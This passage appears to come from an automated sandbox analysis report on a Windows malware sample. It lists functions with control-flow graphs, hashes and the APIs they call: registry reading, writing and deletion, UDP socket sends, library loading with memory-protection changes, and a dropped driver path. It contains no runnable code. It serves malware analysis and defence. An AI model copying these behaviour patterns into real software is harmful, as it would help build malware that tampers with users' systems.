                                  • Opcode Fuzzy Hash: 4aca2f93c926d20e5e9d0242b1f4d1d08f2c2cde66ed81bd3da2e3113ddb5457
                                  • Instruction Fuzzy Hash: 41127EB1D402689BDB24DB64CC98BEFB779EB48300F0046D9EA49E61C4D7749AE5CF60
                                  Function 02303930 Relevance: 9.3, APIs: 6, Instructions: 287registryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1370 2303930-23039dd 1371 23039eb 1370->1371 1372 23039df-23039e9 1370->1372 1374 2303e74-2303e84 1371->1374 1372->1371 1373 23039f0-2303a7d GetUserNameA call 2306e8b RegOpenKeyExA 1372->1373 1380 2303aba-2303abe 1373->1380 1381 2303a7f-2303a83 1373->1381 1384 2303ac4-2303ace 1380->1384 1385 2303ca9-2303ce0 1380->1385 1382 2303a91-2303aac 1381->1382 1383 2303a85-2303a8c 1381->1383 1382->1380 1395 2303aae-2303ab5 1382->1395 1383->1374 1387 2303ad8-2303b04 RegEnumValueA 1384->1387 1388 2303e45-2303e65 1385->1388 1389 2303ce6-2303cf0 1385->1389 1391 2303b06-2303b2b 1387->1391 1392 2303b2d-2303b5b 1387->1392 1388->1374 1400 2303e67-2303e6e RegCloseKey 1388->1400 1389->1388 1394 2303cf6-2303d21 1389->1394 1391->1387 1397 2303b61-2303b73 1392->1397 1398 2303ca4 1392->1398 1404 2303e33-2303e39 1394->1404 1405 2303d27-2303d8e RegQueryValueExA 1394->1405 1395->1374 1402 2303b91 1397->1402 1403 2303b75-2303b83 1397->1403 1398->1388 1400->1374 1402->1398 1403->1402 1406 2303b85-2303b8f 1403->1406 1404->1388 1410 2303d90-2303d9a 1405->1410 1411 2303d9f-2303ddc 1405->1411 1406->1402 1407 2303b96-2303ba0 1406->1407 1409 2303bb1-2303bb8 1407->1409 1412 2303bbe-2303c0b 1409->1412 1413 2303c9f 1409->1413 1410->1404 1414 2303e2e 1411->1414 1415 2303dde-2303de4 1411->1415 1421 2303c0d-2303c13 1412->1421 1422 2303c5e-2303c9a RegSetValueExA 1412->1422 1413->1398 1414->1404 1416 2303deb-2303df9 1415->1416 1417 2303dfb-2303e0c 1415->1417 1418 2303e0e-2303e1d 1415->1418 1419 2303e1f-2303e2b 1415->1419 1416->1414 1417->1414 1418->1414 1419->1414 1421->1416 1421->1417 1421->1418 1421->1419 1424 2303c1a-2303c28 1421->1424 1425 2303c2a-2303c3c 1421->1425 1426 2303c3e-2303c4d 1421->1426 1427 2303c4f-2303c58 1421->1427 1423 2303ba2-2303bab 1422->1423 1423->1409 1424->1422 1425->1422 1426->1422 1427->1422
                                  APIs
                                  • GetUserNameA.ADVAPI32(00000000,00000104), ref: 02303A10
                                  • RegOpenKeyExA.KERNEL32(80000001,?,00000000,000F003F,?), ref: 02303A75
                                  • RegEnumValueA.KERNEL32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 02303AFC
                                  • RegCloseKey.KERNEL32(00000000), ref: 02303E6E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                  • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: CloseEnumNameOpenUserValue
                                  • String ID:
                                  • API String ID: 3905208545-0
                                  • Opcode ID: 20076b4d6a53cef0b019f1eaaac5c8d5b97231b29ef777b0fe6466089122db23
                                  • Instruction ID: 8a018a4cfaae16c2331b2d77bbec84928b2d7794d570c671034d1e5ddf2177c0
                                  • Opcode Fuzzy Hash: 20076b4d6a53cef0b019f1eaaac5c8d5b97231b29ef777b0fe6466089122db23
                                  • Instruction Fuzzy Hash: BCD1B5B1911229DBDB24DF54CC98BEAB7B9FB48704F1086D9E50DA6280D7749BC4CF60
                                  Function 0231F470 Relevance: 7.7, APIs: 5, Instructions: 207librarymemoryloaderCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1428 231f470-231f480 1429 231f492-231f497 1428->1429 1430 231f499 1429->1430 1431 231f488-231f48d 1430->1431 1432 231f49b 1430->1432 1434 231f48e-231f490 1431->1434 1433 231f4a0-231f4a2 1432->1433 1435 231f4a4-231f4a9 1433->1435 1436 231f4ab-231f4af 1433->1436 1434->1429 1434->1430 1435->1436 1437 231f4b1 1436->1437 1438 231f4bc-231f4bf 1436->1438 1439 231f4b3-231f4ba 1437->1439 1440 231f4db-231f4e0 1437->1440 1441 231f4c1-231f4c6 1438->1441 1442 231f4c8-231f4ca 1438->1442 1439->1438 1439->1440 1443 231f4f3-231f4f5 1440->1443 1444 231f4e2-231f4eb 1440->1444 1441->1442 1442->1433 1447 231f4f7-231f4fc 1443->1447 1448 231f4fe 1443->1448 1445 231f562-231f565 1444->1445 1446 231f4ed-231f4f1 1444->1446 1449 231f56a-231f56d 1445->1449 1446->1448 1447->1448 1450 231f500-231f503 1448->1450 1451 231f4cc-231f4ce 1448->1451 1452 231f56f-231f571 1449->1452 1453 231f505-231f50a 1450->1453 1454 231f50c 1450->1454 1455 231f4d0-231f4d5 1451->1455 1456 231f4d7-231f4d9 1451->1456 1452->1449 1457 231f573-231f576 1452->1457 1453->1454 1454->1451 1458 231f50e-231f510 1454->1458 1455->1456 1459 231f52d-231f53c 1456->1459 1457->1449 1460 231f578-231f594 1457->1460 1461 231f512-231f517 1458->1461 1462 231f519-231f51d 1458->1462 1463 231f54c-231f559 1459->1463 1464 231f53e-231f545 1459->1464 1460->1452 1465 231f596 1460->1465 1461->1462 1462->1458 1466 231f51f 1462->1466 1463->1463 1468 231f55b-231f55d 1463->1468 1464->1464 1467 231f547 1464->1467 1469 231f59c-231f5a0 1465->1469 1470 231f521-231f528 1466->1470 1471 231f52a 1466->1471 1467->1434 1468->1434 1472 231f5a2-231f5b8 LoadLibraryA 1469->1472 1473 231f5e7-231f5ea 1469->1473 1470->1458 1470->1471 1471->1459 1474 231f5b9-231f5be 1472->1474 1475 231f5ed-231f5f4 1473->1475 1474->1469 1476 231f5c0-231f5c2 1474->1476 1477 231f5f6-231f5f8 1475->1477 1478 231f618-231f648 VirtualProtect * 2 1475->1478 1482 231f5c4-231f5ca 1476->1482 1483 231f5cb-231f5d8 GetProcAddress 1476->1483 1479 231f60b-231f616 1477->1479 1480 231f5fa-231f609 1477->1480 1481 231f64c-231f650 1478->1481 1479->1480 1480->1475 1481->1481 1484 231f652 1481->1484 1482->1483 1485 231f5e1 ExitProcess 1483->1485 1486 231f5da-231f5df 1483->1486 1486->1474
                                  APIs
                                  • LoadLibraryA.KERNEL32(?), ref: 0231F5B2
                                  • GetProcAddress.KERNEL32(?,0231CFF9), ref: 0231F5D0
                                  • ExitProcess.KERNEL32(?,0231CFF9), ref: 0231F5E1
                                  • VirtualProtect.KERNEL32(022F0000,00001000,00000004,?,00000000), ref: 0231F62F
                                  • VirtualProtect.KERNEL32(022F0000,00001000), ref: 0231F644
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                  • Associated: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: ProtectVirtual$AddressExitLibraryLoadProcProcess
                                  • String ID:
                                  • API String ID: 1996367037-0
                                  • Opcode ID: d47d7ccd0b0b7a30d8738312ef8ef38fbd8f659606bd1d5221914103b37143c7
                                  • Instruction ID: f3e62b889314576f387dd41647ef7b7992ee1bb5d4d4a5bb531e26c0806284b7
                                  • Opcode Fuzzy Hash: d47d7ccd0b0b7a30d8738312ef8ef38fbd8f659606bd1d5221914103b37143c7
                                  • Instruction Fuzzy Hash: 6651F4B2A547524BD7388EB89CC07B0B7A4EB452747180739C6E6C7BC6EBA49806C764
                                  Function 022FA364 Relevance: 7.6, APIs: 5, Instructions: 86registryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1487 22fa364-22fa388 RegOpenKeyExA 1488 22fa38e-22fa395 1487->1488 1489 22fa477-22fa47a 1487->1489 1490 22fa39c-22fa3bf RegEnumValueA 1488->1490 1491 22fa3e2-22fa3e9 1490->1491 1492 22fa3c1-22fa3e0 RegDeleteValueA 1490->1492 1493 22fa3f0-22fa416 RegEnumKeyExA 1491->1493 1492->1490 1494 22fa46d-22fa470 1493->1494 1495 22fa418-22fa46b call 22fa364 RegDeleteKeyA 1493->1495 1494->1489 1495->1493
                                  APIs
                                  • RegOpenKeyExA.KERNEL32(?,?,00000000,000F003F,?), ref: 022FA380
                                  • RegEnumValueA.KERNEL32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 022FA3B7
                                  • RegDeleteValueA.KERNEL32(?,?), ref: 022FA3D3
                                  • RegEnumKeyExA.KERNEL32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 022FA40B
                                  • RegDeleteKeyA.ADVAPI32(?,?), ref: 022FA457
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                  • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: DeleteEnumValue$Open
                                  • String ID:
                                  • API String ID: 3197069048-0
                                  • Opcode ID: 3673b100d541d8c9a6441b3a9c05cddce5830f8ff9fa559975ebdd27b85f6053
                                  • Instruction ID: 0b8828643d7f631c65b468c71f7329c7c7a08718da6e77c85ae6538155387022
                                  • Opcode Fuzzy Hash: 3673b100d541d8c9a6441b3a9c05cddce5830f8ff9fa559975ebdd27b85f6053
                                  • Instruction Fuzzy Hash: 0231E9F9950208FBDB14CBD4DC84FDEB7B8AB08704F108699FB09A7184D774A649CBA4
                                  Function 022F2E87 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 192networkCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1499 22f2e87-22f2f02 call 23078a0 socket 1502 22f319d-22f31a4 1499->1502 1503 22f2f08-22f2f36 call 22f262c 1499->1503 1505 22f31a6-22f31ac 1502->1505 1506 22f31b3-22f31c2 1502->1506 1503->1502 1509 22f2f3c-22f2f62 sendto 1503->1509 1505->1506 1509->1502 1510 22f2f68-22f2f86 1509->1510 1511 22f2f90-22f2f9a 1510->1511 1512 22f2fab-22f2fb7 1511->1512 1513 22f2fb9-22f2fcc 1512->1513 1514 22f2fd2-22f2fde 1512->1514 1515 22f2fce 1513->1515 1516 22f2fd0 1513->1516 1517 22f300b-22f300f 1514->1517 1518 22f2fe0-22f2fe7 1514->1518 1515->1514 1516->1512 1517->1511 1521 22f3015-22f3039 select 1517->1521 1518->1517 1520 22f2fe9-22f3005 1518->1520 1520->1517 1522 22f303b-22f31bb 1521->1522 1523 22f3040-22f3073 1521->1523 1522->1502 1523->1502 1526 22f3079-22f3083 1523->1526 1526->1502 1527 22f3089-22f3090 1526->1527 1527->1502 1528 22f3096-22f30a8 1527->1528 1528->1502 1529 22f30ae-22f30d5 call 22f2217 1528->1529 1529->1502 1532 22f30db-22f3105 call 22f1046 1529->1532 1532->1502 1535 22f310b-22f3115 1532->1535 1535->1502 1536 22f311b-22f3125 1535->1536 1536->1502 1537 22f3127-22f3131 1536->1537 1537->1502 1538 22f3133-22f315e call 2306e8b 1537->1538 1541 22f3193 1538->1541 1542 22f3160-22f316a 1538->1542 1541->1502 1542->1541 1543 22f316c-22f3176 1542->1543 1543->1541 1544 22f3178-22f3182 1543->1544 1544->1541 1545 22f3184-22f3190 call 22f226c 1544->1545 1545->1541
                                  APIs
                                  • socket.WS2_32(00000002,00000002,00000011), ref: 022F2EEF
                                  • sendto.WS2_32(?,?,00000000,00000000,?,00000010), ref: 022F2F59
                                  • select.WS2_32(?,00000000,00000000,00000000,00000014), ref: 022F3031
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                  • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: selectsendtosocket
                                  • String ID: @
                                  • API String ID: 4221616969-2766056989
                                  • Opcode ID: 81a8634c60651eedac85f59b8cc1f7bd7230ad688c56961af9f819b68b6537db
                                  • Instruction ID: 0ba7944673f8c0227c6cd358fd06942acdb0bf6ba1d3db4f981cca0e248d6a75
                                  • Opcode Fuzzy Hash: 81a8634c60651eedac85f59b8cc1f7bd7230ad688c56961af9f819b68b6537db
                                  • Instruction Fuzzy Hash: 7E81CE70D252A88AEB38CB64CC64BEAB775AF45350F4042E9E79DA61C4C7B05EC4CF50
                                  Function 02301D03 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 96registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegOpenKeyExA.KERNEL32(80000001,?,00000000,000F003F,?,?), ref: 02301D4A
                                  • RegSetValueExA.KERNELBASE(?,?,00000000,00000004,00000002,00000004), ref: 02301D78
                                  • RegCloseKey.KERNEL32(?), ref: 02301D85
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                  • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: CloseOpenValue
                                  • String ID: >
                                  • API String ID: 779948276-325317158
                                  • Opcode ID: 7c4b8463a133e1f0a885a21549b9f04efd0bc303e6cd64a6b8dabc594336f025
                                  • Instruction ID: 7bbf00f2e2a42c394af1702b13c1e58a1db9989066c36c32b77e866bc4af6b82
                                  • Opcode Fuzzy Hash: 7c4b8463a133e1f0a885a21549b9f04efd0bc303e6cd64a6b8dabc594336f025
                                  • Instruction Fuzzy Hash: 74317EF5D40218ABD710CB54DC94BEAB3BDEB59704F0086D9EA8A57280D6F15AE4CFA0
                                  Function 022F1B6E Relevance: 6.3, APIs: 4, Instructions: 342registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • GetUserNameA.ADVAPI32(00000000,?), ref: 022F1C31
                                  • RegOpenKeyExA.KERNEL32(80000001,?,00000000,000F003F,?), ref: 022F1CC8
                                  • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 022F1CE9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                  • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: CreateNameOpenUser
                                  • String ID:
                                  • API String ID: 3417583755-0
                                  • Opcode ID: 07f7cfc9d24e95dcf73268aeab1eff6c28aa4802b8949f4786ef75d01a43e92f
                                  • Instruction ID: 2d4b2b7fddd2067424ef5c7a5782cf1134bf966ca61c58a8ca3d17638e626fce
                                  • Opcode Fuzzy Hash: 07f7cfc9d24e95dcf73268aeab1eff6c28aa4802b8949f4786ef75d01a43e92f
                                  • Instruction Fuzzy Hash: 3AE195B1910218DBDB28DF54CC45FEAB779BB0D304F0486E9E74966288D7709BA4CF91
                                  Function 022F1869 Relevance: 6.2, APIs: 4, Instructions: 184registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegOpenKeyExA.KERNEL32(80000001,?,00000000,000F003F,?), ref: 022F199A
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                  • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Open
                                  • String ID:
                                  • API String ID: 71445658-0
                                  • Opcode ID: e1d83c6ce65de93a5f9b6b23082073ba35f18e470a960f4f3db69ecabe868d53
                                  • Instruction ID: 16ca77beb11c8017c4c6907834a320becdd5fb8785ed9ca32549a0fffe1abe33
                                  • Opcode Fuzzy Hash: e1d83c6ce65de93a5f9b6b23082073ba35f18e470a960f4f3db69ecabe868d53
                                  • Instruction Fuzzy Hash: 29714CB5D14218EBDB28CF94CC45BEAF779BB58300F0085E9E749A6244D7B09AD4CFA0
                                  Function 022F3D56 Relevance: 6.1, APIs: 4, Instructions: 98sleepthreadCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 02303090: CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00008000,?,?,?,022F21E7), ref: 023030C7
                                    • Part of subcall function 02303090: MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00008000,?,022F21E7), ref: 023030EE
                                  • Sleep.KERNEL32(000493E0,00000001), ref: 022F3DD5
                                  • CreateThread.KERNEL32(00000000,00000000,Function_00003A74,00000000,00000000,00000000), ref: 022F3E4B
                                  • FindCloseChangeNotification.KERNEL32(00000000), ref: 022F3E52
                                  • Sleep.KERNEL32(00000200), ref: 022F3E5D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                  • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: CreateFileSleep$ChangeCloseFindMappingNotificationThreadView
                                  • String ID:
                                  • API String ID: 249821800-0
                                  • Opcode ID: 3a773a86bd3667a46f5a0ea4051509b5e53a21daaf52dc475bcfa4f125914cb1
                                  • Instruction ID: 665f0edfdb0c03fd34287c80147bfd90f1607e7e9a9096b31da9b82eda3b5a07
                                  • Opcode Fuzzy Hash: 3a773a86bd3667a46f5a0ea4051509b5e53a21daaf52dc475bcfa4f125914cb1
                                  • Instruction Fuzzy Hash: 1C414DF1E50268DBD764DBA0D858B9AB7B8FF04705F4005F8E70AA61D1DBB01A84CF69
                                  Function 02301C79 Relevance: 6.1, APIs: 4, Instructions: 54registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegOpenKeyExA.KERNEL32(00000001,?,00000000,000F003F,?), ref: 02301C99
                                  • RegSetValueExA.KERNEL32(?,00000001,00000000,00000004,00000001,00000004), ref: 02301CB5
                                  • RegCreateKeyA.ADVAPI32(00000001,?,?), ref: 02301CD3
                                  • RegSetValueExA.KERNEL32(?,00000001,00000000,00000004,00000001,00000004), ref: 02301CEF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                  • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Value$CreateOpen
                                  • String ID:
                                  • API String ID: 4052006930-0
                                  • Opcode ID: 0012ccc6e153e60c7f8670b7991a000fca0b0de30280d6be66d933860f14b5fa
                                  • Instruction ID: 1ce18de4a74c1ced6bff2044d2d07cc419cdccce17b640b3238f0afa95040883
                                  • Opcode Fuzzy Hash: 0012ccc6e153e60c7f8670b7991a000fca0b0de30280d6be66d933860f14b5fa
                                  • Instruction Fuzzy Hash: CC11D6B9A40208BBDB04DFA4D999FAB77BDAB4C700F108649FB0997184D670AA14DB60
                                  Function 0047C7D4 Relevance: 4.8, APIs: 3, Instructions: 266memorylibrarysynchronizationCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateMutexA.KERNEL32(00000000,00000000,?), ref: 0047C93E
                                  • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 0047C9ED
                                  • LoadLibraryA.KERNEL32(?), ref: 0047CB6E
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: AllocCreateLibraryLoadMutexVirtual
                                  • String ID:
                                  • API String ID: 4101883406-0
                                  • Opcode ID: 0c0120f338f289cd012ea18f26d6474d14443b2313145660eafd53ec3f30eb48
                                  • Instruction ID: 7fbc8bb3276ab8402d6d65c577c2096bfae57e5682775a5b144c1dc0b876611b
                                  • Opcode Fuzzy Hash: 0c0120f338f289cd012ea18f26d6474d14443b2313145660eafd53ec3f30eb48
                                  • Instruction Fuzzy Hash: 03C1F375A002898FDB10CF28CD85BD937A5FF54301F19891AEC0DAF2A1D779AA44CB5E
                                  Function 02300858 Relevance: 4.6, APIs: 3, Instructions: 82filesleepCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000020,00000000), ref: 02300901
                                  • DeleteFileA.KERNEL32(?), ref: 0230092A
                                    • Part of subcall function 022FFA87: Sleep.KERNEL32(?,?), ref: 022FFB01
                                  • Sleep.KERNEL32(00000400), ref: 02300962
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                  • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: FileSleep$CreateDelete
                                  • String ID:
                                  • API String ID: 3010656087-0
                                  • Opcode ID: 0075f843faf9d5d180bb6059293d40fdf4a03e9bd8502f4faafef09d85c1f8de
                                  • Instruction ID: 2adc94fe0ca3bf7a196bc4fbd3631fa6c4082adc9845cd3fafa010dab315074d
                                  • Opcode Fuzzy Hash: 0075f843faf9d5d180bb6059293d40fdf4a03e9bd8502f4faafef09d85c1f8de
                                  • Instruction Fuzzy Hash: 2831C7B1940B58EBDB10CF98DC59BEBBB78EB44712F1046A4FA09662C0CB755A85CF90
                                  Function 022FB3F5 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 172sleepCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  • C:\Windows\system32\drivers\ptqmrn.sys, xrefs: 022FB621
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                  • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Sleep
                                  • String ID: C:\Windows\system32\drivers\ptqmrn.sys
                                  • API String ID: 3472027048-3231871182
                                  • Opcode ID: bb4d2ca94764aff04006b09f825f815e3fae2864f05f49de393d3290d2c2b710
                                  • Instruction ID: 5c7cb376fc40172cf4ee0f1e25098da6e2d72cc61223234863514ee12b4a6296
                                  • Opcode Fuzzy Hash: bb4d2ca94764aff04006b09f825f815e3fae2864f05f49de393d3290d2c2b710
                                  • Instruction Fuzzy Hash: BA617CF0D90305EFD750EFE4E898F5AB7B8B708325F108B29EA2596288D7745555CF20
                                  Function 0230135E Relevance: 3.2, APIs: 2, Instructions: 153synchronizationCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateMutexA.KERNEL32(00000000,00000000,00000000), ref: 02301561
                                  • FindCloseChangeNotification.KERNEL32(?), ref: 0230158D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                  • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: ChangeCloseCreateFindMutexNotification
                                  • String ID:
                                  • API String ID: 2967213129-0
                                  • Opcode ID: faef8b0c69ceb4068e653d6520a275bb47c8b4e44dee9499bb43401cf9d22ba7
                                  • Instruction ID: ecc0be95f51521bec3c1ceb490d25d28328156ef54678d46839a7eddd1d127d1
                                  • Opcode Fuzzy Hash: faef8b0c69ceb4068e653d6520a275bb47c8b4e44dee9499bb43401cf9d22ba7
                                  • Instruction Fuzzy Hash: 165151F5D402289BCB24DB60DCD8BDEB77DAB58301F0049D5EB4AA6180DBB49AD5CF60
                                  Function 022FBA5A Relevance: 3.1, APIs: 2, Instructions: 76COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetPrivateProfileStringA.KERNEL32(?,?,00000000,00000000,00000080,?), ref: 022FBACC
                                  • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 022FBB61
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                  • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: PrivateProfileString$Write
                                  • String ID:
                                  • API String ID: 2948465352-0
                                  • Opcode ID: aa45dc14d7409149f467012f05dade3c353fa3aaa0ab70bbf24e89b0371f2f54
                                  • Instruction ID: 8ac56bca18447fa0ab2f9d93c6c933ceaf93049c0fa3633a01f0e5fdcf15a3c0
                                  • Opcode Fuzzy Hash: aa45dc14d7409149f467012f05dade3c353fa3aaa0ab70bbf24e89b0371f2f54
                                  • Instruction Fuzzy Hash: 14316DB2E40224BFDB14DB64D858BD6B7BDAB48300F0089E9E60993240DF745BA58F60
                                  Function 02300C04 Relevance: 3.1, APIs: 2, Instructions: 68registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegEnumValueA.KERNEL32(?,00000000,00000000,00000100,00000000,00000000,00000000,00000000), ref: 02300C8F
                                  • RegCloseKey.KERNEL32(?), ref: 02300CFE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1519756597.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022F0000, based on PE: true
                                  • Associated: 00000000.00000002.1519756597.000000000231D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22f0000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: CloseEnumValue
                                  • String ID:
                                  • API String ID: 858281747-0
                                  • Opcode ID: 3a4512e8a6d25a42c0c1d5009656214f6f085f3ec1854169364d0d03fbbe6f49
                                  • Instruction ID: 866a3f7f1ebccf9010667cb817458dc346eca398b4d423000ea9fd07bdfa1fee
                                  • Opcode Fuzzy Hash: 3a4512e8a6d25a42c0c1d5009656214f6f085f3ec1854169364d0d03fbbe6f49
                                  • Instruction Fuzzy Hash: 8821AFB1E40218EBDB24CB54CC99BEAB778AB18700F1046D4E749AA1C0D7F05BD8CFA0
                                  Function 02303090 Relevance: 3.0, APIs: 2, Instructions: 37fileCOMMON
                                  Download Yara Rule
                                  APIs
